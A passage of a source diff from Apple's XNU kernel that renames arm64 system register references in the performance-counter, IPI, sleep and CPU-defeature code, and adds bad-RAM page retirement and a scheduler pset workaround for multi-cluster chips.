@@ -564,7 +533,7 @@ get_counter_config(uint32_t counter)
        case 3:         /* FALLTHROUGH */
        case 4:         /* FALLTHROUGH */
        case 5:
-               pmesr = PMESR_EVT_DECODE(SREG_READ(SREG_PMESR0), counter, 2);
+               pmesr = PMESR_EVT_DECODE(SREG_READ("S3_1_C15_C5_0"), counter, 2);
                break;
        case 6:         /* FALLTHROUGH */
        case 7:
@@ -573,7 +542,7 @@ get_counter_config(uint32_t counter)
        case 8:         /* FALLTHROUGH */
        case 9:
 #endif
-               pmesr = PMESR_EVT_DECODE(SREG_READ(SREG_PMESR1), counter, 6);
+               pmesr = PMESR_EVT_DECODE(SREG_READ("S3_1_C15_C6_0"), counter, 6);
                break;
        default:
                pmesr = 0;
@@ -582,7 +551,7 @@ get_counter_config(uint32_t counter)
 
        kpc_config_t config = pmesr;
 
-       uint64_t pmcr1 = SREG_READ(SREG_PMCR1);
+       uint64_t pmcr1 = SREG_READ("S3_1_C15_C1_0");
 
        if (pmcr1 & PMCR1_EL0_A32_ENABLE_MASK(counter)) {
                config |= CFGWORD_EL0A32EN_MASK;
@@ -616,10 +585,10 @@ set_counter_config(uint32_t counter, uint64_t config)
        case 3:         /* FALLTHROUGH */
        case 4:         /* FALLTHROUGH */
        case 5:
-               pmesr = SREG_READ(SREG_PMESR0);
+               pmesr = SREG_READ("S3_1_C15_C5_0");
                pmesr &= PMESR_EVT_CLEAR(counter, 2);
                pmesr |= PMESR_EVT_ENCODE(config, counter, 2);
-               SREG_WRITE(SREG_PMESR0, pmesr);
+               SREG_WRITE("S3_1_C15_C5_0", pmesr);
                saved_PMESR[cpuid][0] = pmesr;
                break;
 
@@ -630,10 +599,10 @@ set_counter_config(uint32_t counter, uint64_t config)
        case 8:         /* FALLTHROUGH */
        case 9:
 #endif
-               pmesr = SREG_READ(SREG_PMESR1);
+               pmesr = SREG_READ("S3_1_C15_C6_0");
                pmesr &= PMESR_EVT_CLEAR(counter, 6);
                pmesr |= PMESR_EVT_ENCODE(config, counter, 6);
-               SREG_WRITE(SREG_PMESR1, pmesr);
+               SREG_WRITE("S3_1_C15_C6_0", pmesr);
                saved_PMESR[cpuid][1] = pmesr;
                break;
        default:
index c85b85ebc4e6cbbf98471fb0446979bce8692997..6f9bf122bfabda6a6216b6d88c35721aa1487e18 100644 (file)
@@ -27,6 +27,7 @@
  */
 
 #include <machine/asm.h>
+#include <arm64/machine_machdep.h>
 #include <arm64/machine_routines_asm.h>
 #include <arm64/proc_reg.h>
 #include <pexpert/arm64/board_config.h>
 
 .macro COMPARE_BRANCH_FUSION
 #if    defined(APPLE_ARM64_ARCH_FAMILY)
-       mrs             $1, ARM64_REG_HID1
+       mrs             $1, HID1
        .if $0 == CBF_DISABLE
        orr             $1, $1, ARM64_REG_HID1_disCmpBrFusion
        .else
        mov             $2, ARM64_REG_HID1_disCmpBrFusion
        bic             $1, $1, $2
        .endif
-       msr             ARM64_REG_HID1, $1
+       msr             HID1, $1
        .if $0 == CBF_DISABLE
        isb             sy
        .endif
@@ -938,13 +939,9 @@ no_asts:
        ARM64_IS_PCORE x12                                  // if we're not a pCORE, also do nothing
        cbz             x12, 1f
 
-#endif
-
-#if defined(APPLELIGHTNING) || defined(APPLEFIRESTORM)
-
-       mrs             x12, ARM64_REG_HID1                         // if any debug session ever existed, set forceNexL3ClkOn
+       mrs             x12, HID1                         // if any debug session ever existed, set forceNexL3ClkOn
        orr             x12, x12, ARM64_REG_HID1_forceNexL3ClkOn
-       msr             ARM64_REG_HID1, x12
+       msr             HID1, x12
 1:
 
 #endif
index c40e24e6f1cbb4c1e779fc171161def396719a43..3b616122b516a2bd9788da73046ccc1c04393c99 100644 (file)
@@ -184,15 +184,15 @@ ml_cpu_signal_type(unsigned int cpu_mpidr, uint32_t type)
        MRS(local_mpidr, "MPIDR_EL1");
        if (MPIDR_CLUSTER_ID(local_mpidr) == MPIDR_CLUSTER_ID(cpu_mpidr)) {
                uint64_t x = type | MPIDR_CPU_ID(cpu_mpidr);
-               MSR(ARM64_REG_IPI_RR_LOCAL, x);
+               MSR("S3_5_C15_C0_0", x);
        } else {
                #define IPI_RR_TARGET_CLUSTER_SHIFT 16
                uint64_t x = type | (MPIDR_CLUSTER_ID(cpu_mpidr) << IPI_RR_TARGET_CLUSTER_SHIFT) | MPIDR_CPU_ID(cpu_mpidr);
-               MSR(ARM64_REG_IPI_RR_GLOBAL, x);
+               MSR("S3_5_C15_C0_1", x);
        }
 #else
        uint64_t x = type | MPIDR_CPU_ID(cpu_mpidr);
-       MSR(ARM64_REG_IPI_RR, x);
+       MSR("S3_5_C15_C0_1", x);
 #endif
 }
 #endif
@@ -236,7 +236,7 @@ ml_cpu_signal_deferred_adjust_timer(uint64_t nanosecs)
        /* update deferred_ipi_timer_ns with the new clamped value */
        absolutetime_to_nanoseconds(abstime, &deferred_ipi_timer_ns);
 
-       MSR(ARM64_REG_IPI_CR, abstime);
+       MSR("S3_5_C15_C3_1", abstime);
 #else
        (void)nanosecs;
        panic("Platform does not support ACC Fast IPI");
@@ -494,6 +494,7 @@ machine_processor_shutdown(
        return Shutdown_context(doshutdown, processor);
 }
 
+
 /*
  *      Routine:        ml_init_lock_timeout
  *      Function:
@@ -531,6 +532,8 @@ ml_init_lock_timeout(void)
        }
        MutexSpin = abstime;
        low_MutexSpin = MutexSpin;
+
+
        /*
         * high_MutexSpin should be initialized as low_MutexSpin * real_ncpus, but
         * real_ncpus is not set at this time
@@ -543,6 +546,17 @@ ml_init_lock_timeout(void)
        nanoseconds_to_absolutetime(MAX_WFE_HINT_INTERVAL_US * NSEC_PER_USEC, &ml_wfe_hint_max_interval);
 }
 
+/*
+ * This is called when all of the ml_processor_info_t structures have been
+ * initialized and all the processors have been started through processor_start().
+ *
+ * Required by the scheduler subsystem.
+ */
+void
+ml_cpu_init_completed(void)
+{
+}
+
 /*
  * This is called from the machine-independent routine cpu_up()
  * to perform machine-dependent info updates.
@@ -822,29 +836,6 @@ ml_read_chip_revision(unsigned int *rev __unused)
 #endif
 }
 
-static boolean_t
-ml_parse_interrupt_prop(const DTEntry entry, ml_topology_cpu_t *cpu)
-{
-       uint32_t const *prop;
-       unsigned int propSize;
-
-       if (SecureDTGetProperty(entry, "interrupts", (void const **)&prop, &propSize) != kSuccess) {
-               return FALSE;
-       }
-
-       if (propSize == sizeof(uint32_t) * 1) {
-               cpu->pmi_irq = prop[0];
-               return TRUE;
-       } else if (propSize == sizeof(uint32_t) * 3) {
-               cpu->self_ipi_irq = prop[0];
-               cpu->pmi_irq = prop[1];
-               cpu->other_ipi_irq = prop[2];
-               return TRUE;
-       } else {
-               return FALSE;
-       }
-}
-
 void
 ml_parse_cpu_topology(void)
 {
@@ -903,7 +894,6 @@ ml_parse_cpu_topology(void)
                cpu->l3_cache_size = (uint32_t)ml_readprop(child, "l3-cache-size", 0);
                cpu->l3_cache_id = (uint32_t)ml_readprop(child, "l3-cache-id", 0);
 
-               ml_parse_interrupt_prop(child, cpu);
                ml_read_reg_range(child, "cpu-uttdbg-reg", &cpu->cpu_UTTDBG_pa, &cpu->cpu_UTTDBG_len);
                ml_read_reg_range(child, "cpu-impl-reg", &cpu->cpu_IMPL_pa, &cpu->cpu_IMPL_len);
                ml_read_reg_range(child, "coresight-reg", &cpu->coresight_pa, &cpu->coresight_len);
@@ -1231,7 +1221,43 @@ ml_processor_register(ml_processor_info_t *in_processor_info,
        this_cpu_datap->cluster_master = is_boot_cpu;
 #endif /* HAS_CLUSTER */
 
+#if !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2)
+       {
+               /* Workaround for the existing scheduler
+                * code, which only supports a limited number of psets.
+                *
+                * To get around that limitation, we distribute all cores into
+                * two psets according to their cluster type, instead of
+                * having a dedicated pset per cluster ID.
+                */
+
+               pset_cluster_type_t pset_cluster_type;
+
+               /* For this workaround, we don't expect seeing anything else
+                * than E or P clusters. */
+               switch (in_processor_info->cluster_type) {
+               case CLUSTER_TYPE_E:
+                       pset_cluster_type = PSET_AMP_E;
+                       break;
+               case CLUSTER_TYPE_P:
+                       pset_cluster_type = PSET_AMP_P;
+                       break;
+               default:
+                       panic("unknown/unsupported cluster type %d", in_processor_info->cluster_type);
+               }
+
+               pset = pset_find_first_by_cluster_type(pset_cluster_type);
+
+               if (pset == NULL) {
+                       panic("no pset for cluster type %d/%d", in_processor_info->cluster_type, pset_cluster_type);
+               }
+
+               kprintf("%s>chosen pset with cluster id %d cluster type %d for core:\n",
+                   __FUNCTION__, pset->pset_cluster_id, pset->pset_cluster_type);
+       }
+#else /* !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) */
        pset = pset_find(in_processor_info->cluster_id, processor_pset(master_processor));
+#endif /* !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) */
 
        assert(pset != NULL);
        kprintf("%s>cpu_id %p cluster_id %d cpu_number %d is type %d\n", __FUNCTION__, in_processor_info->cpu_id, in_processor_info->cluster_id, this_cpu_datap->cpu_number, in_processor_info->cluster_type);
@@ -1560,12 +1586,25 @@ ml_static_protect(
 void
 ml_static_mfree(
        vm_offset_t vaddr,
-       vm_size_t size)
+       vm_size_t   size)
 {
-       vm_offset_t     vaddr_cur;
-       ppnum_t         ppn;
-       uint32_t freed_pages = 0;
-       uint32_t freed_kernelcache_pages = 0;
+       vm_offset_t vaddr_cur;
+       ppnum_t     ppn;
+       uint32_t    freed_pages = 0;
+       uint32_t    bad_page_cnt = 0;
+       uint32_t    freed_kernelcache_pages = 0;
+
+#if defined(__arm64__) && (DEVELOPMENT || DEBUG)
+       /* For testing hitting a bad ram page */
+       static int count = 0;
+       static int bad_at_cnt = -1;
+       static bool first = true;
+
+       if (first) {
+               (void)PE_parse_boot_argn("bad_static_mfree", &bad_at_cnt, sizeof(bad_at_cnt));
+               first = false;
+       }
+#endif /* defined(__arm64__) && (DEVELOPMENT || DEBUG) */
 
        /* It is acceptable (if bad) to fail to free. */
        if (vaddr < VM_MIN_KERNEL_ADDRESS) {
@@ -1589,6 +1628,19 @@ ml_static_mfree(
                                panic("Failed ml_static_mfree on %p", (void *) vaddr_cur);
                        }
 
+#if defined(__arm64__)
+                       bool is_bad = pmap_is_bad_ram(ppn);
+#if DEVELOPMENT || DEBUG
+                       is_bad |= (count++ == bad_at_cnt);
+#endif /* DEVELOPMENT || DEBUG */
+
+                       if (is_bad) {
+                               ++bad_page_cnt;
+                               vm_page_create_retired(ppn);
+                               continue;
+                       }
+#endif /* defined(__arm64__) */
+
                        vm_page_create(ppn, (ppn + 1));
                        freed_pages++;
                        if (vaddr_cur >= segLOWEST && vaddr_cur < end_kern) {
@@ -1602,7 +1654,7 @@ ml_static_mfree(
        vm_page_kernelcache_count -= freed_kernelcache_pages;
        vm_page_unlock_queues();
 #if     DEBUG
-       kprintf("ml_static_mfree: Released 0x%x pages at VA %p, size:0x%llx, last ppn: 0x%x\n", freed_pages, (void *)vaddr, (uint64_t)size, ppn);
+       kprintf("ml_static_mfree: Released 0x%x pages at VA %p, size:0x%llx, last ppn: 0x%x, +%d bad\n", freed_pages, (void *)vaddr, (uint64_t)size, ppn, bad_page_cnt);
 #endif
 }
 
@@ -1888,7 +1940,7 @@ cache_trap_error(thread_t thread, vm_map_address_t fault_addr)
 }
 
 static void
-cache_trap_recover()
+cache_trap_recover(void)
 {
        vm_map_address_t fault_addr;
 
@@ -1901,7 +1953,8 @@ static void
 set_cache_trap_recover(thread_t thread)
 {
 #if defined(HAS_APPLE_PAC)
-       thread->recover = (vm_address_t)ptrauth_auth_and_resign(&cache_trap_recover,
+       void *fun = &cache_trap_recover;
+       thread->recover = (vm_address_t)ptrauth_auth_and_resign(fun,
            ptrauth_key_function_pointer, 0,
            ptrauth_key_function_pointer, ptrauth_blend_discriminator(&thread->recover, PAC_DISCRIMINATOR_RECOVER));
 #else /* defined(HAS_APPLE_PAC) */
index 5c88ab5c4b6aa4ea28fe7a0802207e9e142f5216..f1f0da4370c192948de6d0c9d9ed7134a0971ccb 100644 (file)
 #include "assym.s"
 
 
+#if defined(HAS_APPLE_PAC)
+
+
+.macro LOAD_CPU_JOP_KEY        dst, tmp
+       mrs             \tmp, TPIDR_EL1
+       ldr             \tmp, [\tmp, ACT_CPUDATAP]
+       ldr             \dst, [\tmp, CPU_JOP_KEY]
+.endmacro
+
+/*
+ * uint64_t ml_enable_user_jop_key(uint64_t user_jop_key)
+ */
+       .align 2
+       .globl EXT(ml_enable_user_jop_key)
+LEXT(ml_enable_user_jop_key)
+
+/*
+ * void ml_disable_user_jop_key(uint64_t user_jop_key, uint64_t saved_jop_state)
+ */
+       .align 2
+       .globl EXT(ml_disable_user_jop_key)
+LEXT(ml_disable_user_jop_key)
+
+#endif /* defined(HAS_APPLE_PAC) */
 
 #if HAS_BP_RET
 
@@ -53,11 +77,11 @@ LEXT(set_bp_ret)
        add             x14, x14, EXT(bp_ret)@pageoff
        ldr             w14, [x14]
 
-       mrs             x13, ARM64_REG_ACC_CFG
+       mrs             x13, CPU_CFG
        and             x13, x13, (~(ARM64_REG_ACC_CFG_bpSlp_mask << ARM64_REG_ACC_CFG_bpSlp_shift))
        and             x14, x14, #(ARM64_REG_ACC_CFG_bpSlp_mask)
        orr             x13, x13, x14, lsl #(ARM64_REG_ACC_CFG_bpSlp_shift)
-       msr             ARM64_REG_ACC_CFG, x13
+       msr             CPU_CFG, x13
 
        ret
 #endif // HAS_BP_RET
@@ -72,8 +96,8 @@ LEXT(set_nex_pg)
        cbz             x14, Lnex_pg_done
 
        // Set the SEG-recommended value of 12 additional reset cycles
-       HID_INSERT_BITS ARM64_REG_HID13, ARM64_REG_HID13_RstCyc_mask, ARM64_REG_HID13_RstCyc_val, x13
-       HID_SET_BITS ARM64_REG_HID14, ARM64_REG_HID14_NexPwgEn, x13
+       HID_INSERT_BITS HID13, ARM64_REG_HID13_RstCyc_mask, ARM64_REG_HID13_RstCyc_val, x13
+       HID_SET_BITS HID14, ARM64_REG_HID14_NexPwgEn, x13
 
 Lnex_pg_done:
        ret
@@ -190,7 +214,7 @@ LEXT(set_mmu_ttb_alternate)
 #else
 #if defined(HAS_VMSA_LOCK)
 #if DEBUG || DEVELOPMENT
-       mrs             x1, ARM64_REG_VMSA_LOCK_EL1
+       mrs             x1, VMSA_LOCK_EL1
        and             x1, x1, #(VMSA_LOCK_TTBR1_EL1)
        cbnz            x1, L_set_locked_reg_panic
 #endif /* DEBUG || DEVELOPMENT */
@@ -265,7 +289,7 @@ LEXT(vmsa_lock)
        mov x0, #(VMSA_LOCK_TTBR1_EL1 | VMSA_LOCK_TCR_EL1 | VMSA_LOCK_VBAR_EL1)
 #endif
        orr x0, x0, x1
-       msr ARM64_REG_VMSA_LOCK_EL1, x0
+       msr VMSA_LOCK_EL1, x0
        isb sy
        ret
 #endif /* defined(HAS_VMSA_LOCK) */
@@ -293,7 +317,7 @@ LEXT(set_tcr)
 #if defined(HAS_VMSA_LOCK)
 #if DEBUG || DEVELOPMENT
        // assert TCR unlocked
-       mrs             x1, ARM64_REG_VMSA_LOCK_EL1
+       mrs             x1, VMSA_LOCK_EL1
        and             x1, x1, #(VMSA_LOCK_TCR_EL1)
        cbnz            x1, L_set_locked_reg_panic
 #endif /* DEBUG || DEVELOPMENT */
@@ -730,7 +754,7 @@ LEXT(arm64_prepare_for_sleep)
 
 #if defined(APPLETYPHOON)
        // <rdar://problem/15827409>
-       HID_SET_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x9
+       HID_SET_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x9
        dsb             sy
        isb             sy
 #endif
@@ -738,11 +762,11 @@ LEXT(arm64_prepare_for_sleep)
 #if HAS_CLUSTER
        cbnz            x0, 1f                                      // Skip if deep_sleep == true
        // Mask FIQ and IRQ to avoid spurious wakeups
-       mrs             x9, ARM64_REG_CYC_OVRD
+       mrs             x9, CPU_OVRD
        and             x9, x9, #(~(ARM64_REG_CYC_OVRD_irq_mask | ARM64_REG_CYC_OVRD_fiq_mask))
        mov             x10, #(ARM64_REG_CYC_OVRD_irq_disable | ARM64_REG_CYC_OVRD_fiq_disable)
        orr             x9, x9, x10
-       msr             ARM64_REG_CYC_OVRD, x9
+       msr             CPU_OVRD, x9
        isb
 1:
 #endif
@@ -750,7 +774,7 @@ LEXT(arm64_prepare_for_sleep)
        cbz             x0, 1f                                          // Skip if deep_sleep == false
 #if __ARM_GLOBAL_SLEEP_BIT__
        // Enable deep sleep
-       mrs             x1, ARM64_REG_ACC_OVRD
+       mrs             x1, ACC_OVRD
        orr             x1, x1, #(ARM64_REG_ACC_OVRD_enDeepSleep)
        and             x1, x1, #(~(ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_mask))
        orr             x1, x1, #(  ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep)
@@ -763,23 +787,40 @@ LEXT(arm64_prepare_for_sleep)
 #if HAS_RETENTION_STATE
        orr             x1, x1, #(ARM64_REG_ACC_OVRD_disPioOnWfiCpu)
 #endif
-       msr             ARM64_REG_ACC_OVRD, x1
+       msr             ACC_OVRD, x1
 
+#if defined(APPLEMONSOON)
+       // Skye has an ACC_OVRD register for EBLK and PBLK. Same bitfield layout for these bits
+       mrs             x1, EBLK_OVRD
+       orr             x1, x1, #(ARM64_REG_ACC_OVRD_enDeepSleep)
+       and             x1, x1, #(~(ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_mask))
+       orr             x1, x1, #(  ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep)
+       and             x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2PwrDnSRM_mask))
+       orr             x1, x1, #(  ARM64_REG_ACC_OVRD_ok2PwrDnSRM_deepsleep)
+       and             x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2TrDnLnk_mask))
+       orr             x1, x1, #(  ARM64_REG_ACC_OVRD_ok2TrDnLnk_deepsleep)
+       and             x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2PwrDnCPM_mask))
+       orr             x1, x1, #(  ARM64_REG_ACC_OVRD_ok2PwrDnCPM_deepsleep)
+       msr             EBLK_OVRD, x1
+
+#endif
 
 #else
+#if defined(APPLETYPHOON) || defined(APPLETWISTER)
        // Enable deep sleep
        mov             x1, ARM64_REG_CYC_CFG_deepSleep
-       msr             ARM64_REG_CYC_CFG, x1
+       msr             CPU_CFG, x1
+#endif
 #endif
 
 1:
        // Set "OK to power down" (<rdar://problem/12390433>)
-       mrs             x9, ARM64_REG_CYC_OVRD
+       mrs             x9, CPU_OVRD
        orr             x9, x9, #(ARM64_REG_CYC_OVRD_ok2pwrdn_force_down)
 #if HAS_RETENTION_STATE
        orr             x9, x9, #(ARM64_REG_CYC_OVRD_disWfiRetn)
 #endif
-       msr             ARM64_REG_CYC_OVRD, x9
+       msr             CPU_OVRD, x9
 
 #if defined(APPLEMONSOON) || defined(APPLEVORTEX)
        ARM64_IS_PCORE x9
@@ -802,12 +843,12 @@ LEXT(arm64_prepare_for_sleep)
        mrs x9, MIDR_EL1
        EXEC_COREALL_REVLO CPU_VERSION_B0, x9, x10
 #endif
-       mrs             x9, ARM64_REG_HID10
+       mrs             x9, HID10
        orr             x9, x9, #(ARM64_REG_HID10_DisHwpGups)
-       msr             ARM64_REG_HID10, x9
+       msr             HID10, x9
        isb             sy
        and             x9, x9, #(~(ARM64_REG_HID10_DisHwpGups))
-       msr             ARM64_REG_HID10, x9
+       msr             HID10, x9
        isb             sy
 #endif
        EXEC_END
@@ -829,9 +870,9 @@ LEXT(arm64_force_wfi_clock_gate)
        ARM64_STACK_PROLOG
        PUSH_FRAME
 
-       mrs             x0, ARM64_REG_CYC_OVRD
+       mrs             x0, CPU_OVRD
        orr             x0, x0, #(ARM64_REG_CYC_OVRD_ok2pwrdn_force_up)
-       msr             ARM64_REG_CYC_OVRD, x0
+       msr             CPU_OVRD, x0
        
        POP_FRAME
        ARM64_STACK_EPILOG
@@ -863,7 +904,7 @@ LEXT(typhoon_prepare_for_wfi)
        PUSH_FRAME
 
        // <rdar://problem/15827409>
-       HID_SET_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0
+       HID_SET_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0
        dsb             sy
        isb             sy
 
@@ -878,7 +919,7 @@ LEXT(typhoon_return_from_wfi)
        PUSH_FRAME
 
        // <rdar://problem/15827409>
-       HID_CLEAR_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0
+       HID_CLEAR_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0
        dsb             sy
        isb             sy 
 
@@ -923,57 +964,57 @@ LEXT(cpu_defeatures_set)
        cmp             x0, #1
        b.ne            cpu_defeatures_set_ret
        LOAD_UINT64     x1, HID0_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID0
+       mrs             x0, HID0
        orr             x0, x0, x1
-       msr             ARM64_REG_HID0, x0
+       msr             HID0, x0
        LOAD_UINT64     x1, HID1_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID1
+       mrs             x0, HID1
        orr             x0, x0, x1
-       msr             ARM64_REG_HID1, x0
+       msr             HID1, x0
        LOAD_UINT64     x1, HID2_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID2
+       mrs             x0, HID2
        orr             x0, x0, x1
-       msr             ARM64_REG_HID2, x0
+       msr             HID2, x0
        LOAD_UINT64     x1, HID3_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID3
+       mrs             x0, HID3
        orr             x0, x0, x1
-       msr             ARM64_REG_HID3, x0
+       msr             HID3, x0
        LOAD_UINT64     x1, HID4_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID4
+       mrs             x0, S3_0_C15_C4_0
        orr             x0, x0, x1
-       msr             ARM64_REG_HID4, x0
+       msr             S3_0_C15_C4_0, x0
        LOAD_UINT64     x1, HID7_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID7
+       mrs             x0, HID7
        orr             x0, x0, x1
-       msr             ARM64_REG_HID7, x0
+       msr             HID7, x0
        dsb             sy
        isb             sy 
        b               cpu_defeatures_set_ret
 cpu_defeatures_set_2:
        LOAD_UINT64     x1, HID0_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID0
+       mrs             x0, HID0
        orr             x0, x0, x1
-       msr             ARM64_REG_HID0, x0
+       msr             HID0, x0
        LOAD_UINT64     x1, HID1_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID1
+       mrs             x0, HID1
        orr             x0, x0, x1
-       msr             ARM64_REG_HID1, x0
+       msr             HID1, x0
        LOAD_UINT64     x1, HID2_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID2
+       mrs             x0, HID2
        orr             x0, x0, x1
-       msr             ARM64_REG_HID2, x0
+       msr             HID2, x0
        LOAD_UINT64     x1, HID3_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID3
+       mrs             x0, HID3
        orr             x0, x0, x1
-       msr             ARM64_REG_HID3, x0
+       msr             HID3, x0
        LOAD_UINT64     x1, HID4_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID4
+       mrs             x0, S3_0_C15_C4_0
        orr             x0, x0, x1
-       msr             ARM64_REG_HID4, x0
+       msr             S3_0_C15_C4_0, x0
        LOAD_UINT64     x1, HID7_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID7
+       mrs             x0, HID7
        orr             x0, x0, x1
-       msr             ARM64_REG_HID7, x0
+       msr             HID7, x0
        dsb             sy
        isb             sy 
        b               cpu_defeatures_set_ret
index cd62e333adbd8e3fe2175bc45d2bcd6d5393ce1c..d12abcc6f65c18ccc7991525fa99c77196c1369d 100644 (file)
@@ -65,15 +65,12 @@ __END_DECLS
 
 __BEGIN_DECLS
 
-#define PMCR0 "s3_1_c15_c0_0"
-
 /* set by hardware if a PMI was delivered */
 #define PMCR0_PMAI (UINT64_C(1) << 11)
 #define PMCR0_PMI(REG) ((REG) & PMCR0_PMAI)
 
 #if HAS_UNCORE_CTRS
 
-#define UPMSR "s3_7_c15_c6_4"
 #define UPMSR_PMI(REG) ((REG) & 0x1)
 
 #endif /* HAS_UNCORE_CTRS */
@@ -82,20 +79,20 @@ static inline bool
 mt_pmi_pending(uint64_t * restrict pmcr0_out,
     uint64_t * restrict upmsr_out)
 {
-       uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0);
+       uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1");
        bool pmi = PMCR0_PMI(pmcr0);
        if (pmi) {
                /*
                 * Acknowledge the PMI by clearing the pmai bit.
                 */
-               __builtin_arm_wsr64(PMCR0, pmcr0 & ~PMCR0_PMAI);
+               __builtin_arm_wsr64("PMCR0_EL1", pmcr0 & ~PMCR0_PMAI);
        }
        *pmcr0_out = pmcr0;
 
 #if HAS_UNCORE_CTRS
        extern bool mt_uncore_enabled;
        if (mt_uncore_enabled) {
-               uint64_t upmsr = __builtin_arm_rsr64(UPMSR);
+               uint64_t upmsr = __builtin_arm_rsr64("UPMSR_EL1");
                if (UPMSR_PMI(upmsr)) {
                        pmi = true;
                }
index 8cf48ad7010ec4f503eb977549c8666d0360a0b4..06d845f8f3332d2dec334560c06000fb3863f630 100644 (file)
@@ -78,22 +78,10 @@ static const ml_topology_info_t *topology_info;
  *
  * PMC2+ are currently handled by kpc.
  */
-
-#define PMC0 "s3_2_c15_c0_0"
-#define PMC1 "s3_2_c15_c1_0"
-#define PMC2 "s3_2_c15_c2_0"
-#define PMC3 "s3_2_c15_c3_0"
-#define PMC4 "s3_2_c15_c4_0"
-#define PMC5 "s3_2_c15_c5_0"
-#define PMC6 "s3_2_c15_c6_0"
-#define PMC7 "s3_2_c15_c7_0"
-
 #define PMC_0_7(X, A) X(0, A); X(1, A); X(2, A); X(3, A); X(4, A); X(5, A); \
     X(6, A); X(7, A)
 
 #if CORE_NCTRS > 8
-#define PMC8 "s3_2_c15_c9_0"
-#define PMC9 "s3_2_c15_c10_0"
 #define PMC_8_9(X, A) X(8, A); X(9, A)
 #else // CORE_NCTRS > 8
 #define PMC_8_9(X, A)
@@ -167,9 +155,6 @@ enum {
 /*
  * PMCR1 controls which execution modes count events.
  */
-
-#define PMCR1 "s3_1_c15_c1_0"
-
 #define PMCR1_EL0A32_EN(CTR) (UINT64_C(1) << (0 + CTR_POS(CTR)))
 #define PMCR1_EL0A64_EN(CTR) (UINT64_C(1) << (8 + CTR_POS(CTR)))
 #define PMCR1_EL1A64_EN(CTR) (UINT64_C(1) << (16 + CTR_POS(CTR)))
@@ -190,30 +175,13 @@ core_init_execution_modes(void)
 {
        uint64_t pmcr1;
 
-       pmcr1 = __builtin_arm_rsr64(PMCR1);
+       pmcr1 = __builtin_arm_rsr64("PMCR1_EL1");
        pmcr1 |= PMCR1_INIT;
-       __builtin_arm_wsr64(PMCR1, pmcr1);
+       __builtin_arm_wsr64("PMCR1_EL1", pmcr1);
 }
 
-/*
- * PMCR2 controls watchpoint registers.
- *
- * PMCR3 controls breakpoints and address matching.
- *
- * PMCR4 controls opcode matching.
- */
-
-#define PMCR2 "s3_1_c15_c2_0"
-#define PMCR3 "s3_1_c15_c3_0"
-#define PMCR4 "s3_1_c15_c4_0"
-
-#define PMSR "s3_1_c15_c13_0"
-
 #define PMSR_OVF(CTR) (1ULL << (CTR))
 
-#define PMESR0 "S3_1_c15_c5_0"
-#define PMESR1 "S3_1_c15_c6_0"
-
 static int
 core_init(__unused mt_device_t dev)
 {
@@ -231,7 +199,7 @@ uint64_t
 mt_core_snap(unsigned int ctr)
 {
        switch (ctr) {
-#define PMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(PMC ## CTR)
+#define PMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(__MSR_STR(PMC ## CTR))
                PMC_ALL(PMC_RD, 0);
 #undef PMC_RD
        default:
@@ -245,10 +213,10 @@ mt_core_set_snap(unsigned int ctr, uint64_t count)
 {
        switch (ctr) {
        case 0:
-               __builtin_arm_wsr64(PMC0, count);
+               __builtin_arm_wsr64("PMC0", count);
                break;
        case 1:
-               __builtin_arm_wsr64(PMC1, count);
+               __builtin_arm_wsr64("PMC1", count);
                break;
        default:
                panic("monotonic: invalid core counter %u write %llu", ctr, count);
@@ -259,7 +227,7 @@ mt_core_set_snap(unsigned int ctr, uint64_t count)
 static void
 core_set_enabled(void)
 {
-       uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0);
+       uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1");
        pmcr0 |= PMCR0_INIT | PMCR0_FIXED_EN;
 
        if (kpc_get_running() & KPC_CLASS_CONFIGURABLE_MASK) {
@@ -275,12 +243,12 @@ core_set_enabled(void)
                pmcr0 |= kpc_ctrs;
        }
 
-       __builtin_arm_wsr64(PMCR0, pmcr0);
+       __builtin_arm_wsr64("PMCR0_EL1", pmcr0);
 #if MACH_ASSERT
        /*
         * Only check for the values that were ORed in.
         */
-       uint64_t pmcr0_check = __builtin_arm_rsr64(PMCR0);
+       uint64_t pmcr0_check = __builtin_arm_rsr64("PMCR0_EL1");
        if ((pmcr0_check & (PMCR0_INIT | PMCR0_FIXED_EN)) != (PMCR0_INIT | PMCR0_FIXED_EN)) {
                panic("monotonic: hardware ignored enable (read %llx, wrote %llx)",
                    pmcr0_check, pmcr0);
@@ -295,18 +263,18 @@ core_idle(__unused cpu_data_t *cpu)
        assert(ml_get_interrupts_enabled() == FALSE);
 
 #if DEBUG
-       uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0);
+       uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1");
